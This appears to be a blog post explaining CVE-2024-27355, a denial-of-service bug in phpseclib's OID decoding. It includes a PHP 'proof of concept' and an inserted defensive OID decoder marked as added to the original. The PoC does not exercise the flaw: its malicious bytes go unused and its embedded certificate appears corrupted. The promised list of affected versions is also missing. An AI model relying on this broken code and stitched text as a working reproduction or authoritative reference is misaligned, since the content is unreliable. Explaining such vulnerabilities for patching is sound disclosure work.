CVE-2024-27355 - Critical DoS Vulnerability in phpseclib ASN.1 OID Decoding (Explained, with PoC)
CVE-2024-27355 reveals a denial-of-service (DoS) vulnerability affecting multiple versions of phpseclib, a popular PHP library for secure communications. Attackers can specially craft ASN.1 object identifiers (OIDs) in certificates to cause high CPU usage on affected systems, effectively taking down PHP applications and services.
This post breaks down how CVE-2024-27355 works, affected versions, exploitation details, a reproducible code snippet, and how to protect your PHP software.
What is phpseclib?
phpseclib is an open-source PHP library that implements cryptographic protocols such as SSH, SFTP, X.509, and more. It’s widely used in applications for handling encryption and certificate details.
The Vulnerability
CVE-2024-27355 is a weakness in how phpseclib decodes ASN.1 Object Identifiers (OIDs) within X.509 certificates.
An attacker can supply a certificate with a crafted OID (for example, in the subject or issuer field). When phpseclib processes it, the OID-parsing function (decodeOID) can end up in a compute-intensive loop that spikes the CPU and causes a denial of service: the server becomes unresponsive.
Real-World Scenarios
- Accepting certificates from users (SSL, S/MIME, etc.)
Proof-of-Concept (PoC) Code
Let’s see a minimal example. For this, suppose you let users upload certificates and use phpseclib to parse them.
PoC: Create a certificate with a malformed OID
```php
<?php
require 'vendor/autoload.php';

// phpseclib 2.x namespace; phpseclib 3.x uses phpseclib3\File\X509
use phpseclib\File\X509;

// Malicious OID bytes (very long sequence of subidentifiers, triggers DoS).
// Illustrative only: a real trigger uses an even longer or more broken OID.
$malicious_oid = hex2bin('060A2B060104018237650AAAAAAAAAAAAAAAAAAA');

$malicious_cert = "-----BEGIN CERTIFICATE-----\n" .
"MIIBqjCCAVKgAwIBAgIJAKQZshnvpcM3MAoGCCqGSM49BAMCMBIxEDAOBgNVBAMM\n" .
"B3Rlc3QtY2VydDAeFwyNDAyMTQxNzQ2NDlaFwyNDAzMTUxNzQ2NDlaMBIxEDAO\n" .
"BgNVBAMMB3Rlc3QtY2VydDBZMBMGByqGSM49AgEGCCqGSM49AwEHAIABLmJr6w\n" .
"P7Vq4+Ra+xf7F+NQov5tF6lBDRX1/aZ12AXud3AbdxtlFzmfdSA6SyyQnISw6N\n" .
"SyNNOKv8uiBh+UCjUDBOMBGA1UdDgQWBBQZb6eZcoIjfDU2cX2VGJwJhIkv1jAf\n" .
"BgNVHSMEGDAWgBQZb6eZcoIjfDU2cX2VGJwJhIkv1jAMBgNVHRMEBTADAQH/MAoG\n" .
"CCqGSM49BAMCAgAMEUCIQC5KHsW3mkCYQnKPfwZtoPmAOnqSadrRbrUPwG5RrW\n" .
"PAIgMzwX1ZIwJU1JPxsbBMCj+1gzGqfCqtUIK2l5X3RMALM=\n" .
"-----END CERTIFICATE-----\n";

// For demo purposes the legitimate OID is not actually replaced here: a real attack
// manipulates the DER before PEM encoding, so $malicious_oid is unused below.

// Try parsing the certificate
$x509 = new X509();
try {
    // loadX509() returns false when the input cannot be decoded
    if ($x509->loadX509($malicious_cert) === false) {
        echo "Certificate could not be parsed\n";
    } else {
        echo "Certificate parsed successfully\n";
    }
} catch (Exception $e) {
    echo "Error parsing certificate: " . $e->getMessage() . "\n";
}
```
Note: Crafting an actual malicious certificate requires manipulating the DER bytes to insert a very long or malformed OID. See this GitHub advisory for real-world examples (and mitigation).
Why Does This Happen?
decodeOID, the function responsible for breaking down OIDs, can be forced into excessive iteration by a string of large sub-identifiers ("nodes"). ASN.1 OIDs encode each sub-identifier as a variable-length integer, so a malicious value can make parsing extremely slow.
> PHP is single-threaded, so if the function runs for seconds (or longer), it blocks all processing. If attackers send multiple requests, they exhaust web server resources.
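To make the encoding concrete from the defender's side, the following added example (not phpseclib's code and not part of the original post) decodes OID content octets with explicit caps, so the work per OID stays bounded. The function name `decodeOidBounded` and the limits `MAX_OID_BYTES` and `MAX_ARC_BYTES` are assumptions chosen for illustration, and the sample inputs are constructed.

```php
<?php
declare(strict_types=1);

// Added example, not phpseclib code. Both caps are assumed values for illustration.
const MAX_OID_BYTES = 64; // total content octets accepted per OID
const MAX_ARC_BYTES = 9;  // 9 * 7 = 63 bits, so each arc fits a 64-bit PHP int

/** Decode OID content octets to dotted form; throws when malformed or over a cap. */
function decodeOidBounded(string $content): string
{
    $len = strlen($content);
    if ($len === 0 || $len > MAX_OID_BYTES) {
        throw new LengthException("OID content is $len bytes, allowed 1.." . MAX_OID_BYTES);
    }
    $arcs = [];
    $value = $arcBytes = 0;
    for ($i = 0; $i < $len; $i++) {
        $byte = ord($content[$i]);
        if ($arcBytes === 0 && $byte === 0x80) {
            throw new UnexpectedValueException("non-minimal sub-identifier at offset $i");
        }
        if (++$arcBytes > MAX_ARC_BYTES) {
            throw new LengthException("sub-identifier exceeds " . MAX_ARC_BYTES . " bytes at offset $i");
        }
        $value = ($value << 7) | ($byte & 0x7F);
        if ($byte & 0x80) {
            continue; // continuation bit set: this arc has more bytes
        }
        if ($arcs === []) {
            // The first sub-identifier packs the first two arcs as 40 * X + Y
            $first = $value < 80 ? intdiv($value, 40) : 2;
            $arcs = [$first, $value - 40 * $first];
        } else {
            $arcs[] = $value;
        }
        $value = $arcBytes = 0;
    }
    if ($arcBytes !== 0) {
        throw new UnexpectedValueException('truncated: final byte has the continuation bit set');
    }
    return implode('.', $arcs);
}

// Constructed inputs: a well-formed OID, an over-long arc, a truncated arc
foreach (["\x2B\x06\x01\x04\x01\x82\x37", str_repeat("\xAA", 12) . "\x01", "\x2B\x86"] as $bytes) {
    try { echo decodeOidBounded($bytes), "\n"; }
    catch (Exception $e) { echo 'rejected: ', $e->getMessage(), "\n"; }
}
```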
See full changelog
- phpseclib 3.0.36 Release Notes
References & Further Reading
- phpseclib security advisory - GHSA-8273-2qj9-v9cp
- NVD Entry for CVE-2024-27355
- phpseclib's 3.0.36 patch diff
- Understanding ASN.1 OIDs
Summary
CVE-2024-27355 is a denial-of-service bug in all major branches of phpseclib, triggered by malicious OIDs in ASN.1 certificates. Unless you upgrade, your PHP services parsing certificates can be taken offline with a simple crafted request, no authentication needed.
Timeline
Published on: 03/01/2024 23:15:08 UTC
Last modified on: 08/13/2024 14:35:13 UTC